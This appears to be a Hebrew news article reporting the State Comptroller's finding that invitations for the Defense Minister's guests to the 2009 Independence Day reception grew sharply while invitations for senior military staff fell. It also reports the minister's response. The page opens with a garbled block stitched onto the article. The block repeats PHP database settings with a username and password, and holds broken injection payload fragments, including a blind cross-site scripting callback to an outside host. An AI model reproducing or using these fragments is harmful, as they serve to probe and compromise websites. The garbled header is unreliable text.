$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> עלייה חדה במספר המוזמנים של שר הביטחון לטקס ביום העצמאות
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

יותר אורחים של שר הביטחון ופחות אנשי צבא בקבלת הפנים

תאריך: 08/08/2010 15:55   מחבר: מערכת האתר

מדי שנה בשנה, נערכת במוצאי יום העצמאות במתחם משרד הביטחון שבמחנה רבין  קבלת פנים לרגל יום העצמאות של מדינת ישראל.  המזמין הוא שר הביטחון. המדובר באירוע נוצץ שכל מי שמחשיב עצמו בתעשייה, שואף להיכלל ברשימת המוזמנים היוקרתית והסלקטיבית.  הואיל והוצאות האירוח ממומנות מתקציב משרד הביטחון, וכאשר יש חריגות לא סבירות, זה הזמן והמקום של מבקר המדינה להיכנס לעובי הקורה, לבדוק ההצדקה להוצאות, לאתר חריגות ולהנחות את המבוקרים כיצד לפעול לפי נורמות מקובלות בשירות הציבורי.

הביקורת

מבקר המדינה נדרש לבדיקה בעניין קבלת הפנים ביום העצמאות של שנת 2009. עלות האירוע הסתכמה בכ- 1.5 מיליון ₪. סכום גבוה לכל בר דעת, שהביא את המבקר להחלטה לבדוק מקור ההוצאה הגבוהה.

לפי נתוני משרד הביטחון כפי שנמסרו לבקשת המבקר, בשנת 2009 נשלחו כ-6,000 הזמנות זוגיות, בחלוקה של כשליש למוזמנים מצה"ל ומהמשרד, כשליש למוזמנים מהקבוצות האחרות וכשליש לאורחי שר הביטחון. בקבוצת אורחי השר נכללו, בין היתר, אנשי עסקים, עיתונאים, סופרים וחברי מפלגה.

בחודשים יוני ויולי 2009 בדק משרד מבקר המדינה את תהליך קביעת הרשימה של האורחים לקבלת הפנים שנערכה בשנה זו ואת מספר המוזמנים לאירועים אלה בחמש השנים האחרונות. הביקורת נערכה בלשכת שר הביטחון, ובדיקות השלמה נערכו באגף מבצעים לוגיסטיים ונכסים שבמשרד ובצה"ל. בירורי השלמה נערכו באוקטובר 2009.

יותר אורחים של השר ופחות אנשי צבא

מבקר המדינה מצא במהלך הביקורת כי במהלך השנים 2004 ועד 2009 חל גידול של כ – 60% במספר הכולל של ההזמנות שנשלחו, בו בזמן, שמספרן של ההזמנות שנשלחו לאורחי שר הביטחון אהוד ברק, גדל בכ- 230% . המבקר מדגיש בדוח שלו כי הגידול במספר ההזמנות לאורחי השר בולט במיוחד נוכח הירידה של כ- 20% במספר ההזמנות שנשלחו לסגל הפיקוד הבכיר של צה"ל ולמגדי"ם בשנים 2007-2009.

בדיקת התהליך לקביעת רשימת המוזמנים בכלל ולקבלת הפנים שנערכה בשנת 2009 בפרט העלתה אי-סדרים מהותיים, בעיקר בנוגע להכנת רשימת המוזמנים בקבוצת "אורחי שר הביטחון". להלן הפירוט:

במשרד בכלל, לרבות בלשכת שר הביטחון, אין מסמך המגדיר את ייעודו של אירוע זה ובהמשך לכך את תוכנו. כמו כן, לא נקבע גורם אחראי על האירוע, מעבר לאחריות רמ"ט שר הביטחון בכל עניין הנוגע ללשכת השר ולא נקבעו כללים או אמות מידה, לא בנוגע לתמהיל המוזמנים, לא בנוגע למספר הכולל של המוזמנים ולא בנוגע למספר אורחי שר הביטחון. בהיעדר גורם מרכז, האירוע מתנהל על פי קביעות משתנות של שרי הביטחון ועוזריהם, ללא בקרה ושליטה ראויה על רשימת המוזמנים בכללותה;

רשימת אורחי שר הביטחון נקבעת על ידי השר ורעייתו, עוזריו ויועציו, ללא גורם מתאם ומרכז;

לשכת שר הביטחון אינה מעבירה לאגף מבצעים לוגיסטיים ונכסים שבמשרד האחראי, כאמור, להדפסת ההזמנות ולהפצתן, רשימה אחת הכוללת את כל המוזמנים, אלא עוזרי השר ורמ"ט השר מעבירים רשימות חלקיות, המתעדכנות מספר פעמים עד האירוע;

לחלק מהמוזמנים נשלחו במקביל מספר הזמנות לכתובות שונות, וחלק אחר של המוזמנים הוזמנו כאורחי השר, וגם קיבלו הזמנה נוספת בגין השתייכותם לאחת מהקבוצות האחרות המוזמנות.

מסקנות המבקר

לאור הממצאים הגיע המבקר למסקנות כי התהליך לקביעת רשימת המוזמנים התנהל באופן לקוי, ללא יד מכוונת וללא שליטה מרכזית. התנהלות שכזו, קובע המבקר, הנעשית שלא בהתאם לכללי המינהל התקין, היא ליקוי מהותי במיוחד כאשר מדובר על מספר רב של אורחים , שלא ברורה חשיבותם והרלוונטיות שלהם לאירוע. הדבר חומר במיוחד לדעת המבקר, כאשר מדובר באירוע ממלכתי מרכזי של מערכת הביטחון, אירוע הקבוע והידוע מראש ויש לו נראות ציבורית בולטת.

אשר על כן קובע המבקר כי יש חשיבות גדולה שהליקויים יתוקנו לאלתר ושייקבעו כללים לארגון ולקיום אירוע זה, אותם יאשר שר הביטחון. על כללים אלה להתייחס, בין היתר, לייעוד האירוע ולתוכנו, למהות קבוצות המוזמנים, לתמהיל המוזמנים, למספרם הכולל ולמספר אורחי שר הביטחון. כמו כן, על הכללים לקבוע מי הם בעלי התפקידים המופקדים על הכנת רשימת המוזמנים, ומי הגורם הנושא באחריות הכוללת לנושא ולריכוזו. כל זאת, כדי להבטיח, כי כבר באירוע המתוכנן להתקיים במאי 2010, במוצאי יום העצמאות ה-62 למדינת ישראל, יבואו על תיקונם הליקויים שעליהם מצביע משרד מבקר המדינה עתה.

תגובת השר

בפברואר 2010 הודיע שר הביטחון למבקר המדינה, כי הערות הביקורת מקובלות, וכי בעקבותיהן, "בימים אלה אנו פועלים ליישום הלקחים על מנת ששליחת ההזמנות לקבלת הפנים במוצאי יום העצמאות התש"ע-2010, תבוצע בהתאם לכללים ברורים, תוך התייחסות לקבוצות המוזמנים, לתמהיל הנכון ולהיקפים השונים". עוד הוסיף שר הביטחון, כי "הוקמה ועדה מייעצת, העוסקת במכלול הסוגיות הנוגעות להיערכות לקבלת הפנים, כך שאירוע קבלת פנים המתקיים ברחבת משרד הביטחון במוצאי יום העצמאות, יוסיף להיות אירוע ממלכתי, חשוב, מרכזי מכובד".